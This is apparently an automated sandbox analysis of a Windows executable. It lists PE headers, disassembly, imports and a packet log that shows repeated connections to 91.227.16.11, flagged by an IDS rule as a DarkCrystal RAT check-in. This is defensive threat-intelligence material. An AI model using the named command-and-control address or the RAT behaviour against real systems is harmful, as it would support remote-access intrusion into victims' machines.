                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                    File Icon

                                                                    Icon Hash:1515d4d4442f2d2d

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x41f530
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007F9804F7259Bh
                                                                    jmp 00007F9804F71EADh
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007F9804F64CF7h
                                                                    mov dword ptr [esi], 004356D0h
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 004356D8h
                                                                    mov dword ptr [ecx], 004356D0h
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 004356B8h
                                                                    push eax
                                                                    call 00007F9804F7533Fh
                                                                    test byte ptr [ebp+08h], 00000001h
                                                                    pop ecx
                                                                    je 00007F9804F7203Ch
                                                                    push 0000000Ch
                                                                    push esi
                                                                    call 00007F9804F715F9h
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 0Ch
                                                                    lea ecx, dword ptr [ebp-0Ch]
                                                                    call 00007F9804F64C72h
                                                                    push 0043BEF0h
                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                    push eax
                                                                    call 00007F9804F74DF9h
                                                                    int3
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 0Ch
                                                                    lea ecx, dword ptr [ebp-0Ch]
                                                                    call 00007F9804F71FB8h
                                                                    push 0043C0F4h
                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                    push eax
                                                                    call 00007F9804F74DDCh
                                                                    int3
                                                                    jmp 00007F9804F76877h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push 00422900h
                                                                    push dword ptr fs:[00000000h]

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                    PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                    RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                    RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                    RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                    RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                    RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                    RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                    RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                    RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                    RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                    RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                    RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                    RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                    RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                    RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                    RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                    RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                    RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                    RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                    RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                    RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                    RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                    RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                    RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                    RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                    RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                    OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                    gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    03/05/24-22:27:38.801530TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4971280192.168.2.591.227.16.11

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 5, 2024 22:27:38.593286991 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:38.800472975 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:38.800580025 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:38.801529884 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.008732080 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.008857965 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.009859085 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.260268927 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.332370996 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.332385063 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.332436085 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.332442045 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.373193979 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.390825033 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.503212929 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.597830057 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.597853899 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.598098993 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.713207006 CET804971391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.713325024 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.713490963 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.830224991 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.888834000 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.903587103 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:39.923377037 CET804971391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.923392057 CET804971391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:39.923912048 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:40.110676050 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.110918045 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:40.134238005 CET804971391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.160717010 CET804971391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.201316118 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:40.318149090 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.343519926 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.388818026 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:40.485521078 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:40.692538023 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.695722103 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:40.902708054 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.930201054 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:40.971128941 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.119770050 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.123929977 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.124023914 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.327897072 CET804971291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.328083038 CET4971280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.331806898 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.331902027 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.332324982 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.334671974 CET804971391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.334733963 CET4971380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.538918018 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.539086103 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.546672106 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:41.753654957 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.779422998 CET804971691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:41.826311111 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.573457956 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.785317898 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:42.785419941 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.785655975 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:42.997642994 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:42.997656107 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.000134945 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.211087942 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.240186930 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.279428005 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.686630964 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.688293934 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.897047997 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.897166014 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.897362947 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:43.897548914 CET804971891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:43.897691965 CET4971880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:44.106237888 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.106301069 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.106573105 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:44.315160036 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.335654974 CET4971680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:44.340728045 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:44.576292038 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.361994028 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.362554073 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.570801973 CET804971991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.570880890 CET4971980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.572491884 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.572590113 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.572776079 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.782697916 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.782732010 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:45.782968044 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:45.993279934 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:46.017302990 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:46.123182058 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.378238916 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.379172087 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.588100910 CET804972091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.588195086 CET4972080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.590804100 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.590884924 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.591056108 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:47.802745104 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.802783966 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:47.803042889 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:48.014801025 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:48.041311026 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:48.123178005 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:50.825650930 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:50.827208042 CET4972480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.031073093 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.035710096 CET804972491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.035872936 CET4972480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.037878036 CET804972291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.037939072 CET4972280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.186572075 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.239940882 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.240181923 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.240278959 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.393663883 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.393757105 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.393934965 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.449018955 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.449037075 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.449239969 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.600509882 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.600543022 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.600830078 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.658437014 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.683653116 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.732666969 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:51.807854891 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.835338116 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:51.966953039 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.038647890 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.038763046 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.040537119 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.245843887 CET804972691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.245938063 CET4972680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.247339010 CET804972591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.247597933 CET4972580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.251183987 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.251271009 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.251434088 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.462176085 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.462318897 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.462518930 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.675096035 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.700391054 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:52.856338978 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:52.857768059 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.067193985 CET804972891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.068556070 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.068727016 CET4972880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.068809032 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.072901011 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.283654928 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.283679008 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.283909082 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.494862080 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.519001007 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.576329947 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.685764074 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.686964989 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.895731926 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.895827055 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.895978928 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:53.896411896 CET804972991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:53.896620035 CET4972980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.104897022 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.104914904 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.105109930 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.313968897 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.338901997 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.435666084 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.504595995 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.506339073 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.713612080 CET804973091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.713686943 CET4973080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.716958046 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.717140913 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.722373962 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:54.933713913 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.938949108 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:54.939342022 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.150933027 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.174726009 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.216995001 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.315391064 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.316189051 CET4973280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.526549101 CET804973191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.526725054 CET4973180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:27:55.528381109 CET804973291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:27:55.528474092 CET4973280192.168.2.591.227.16.11
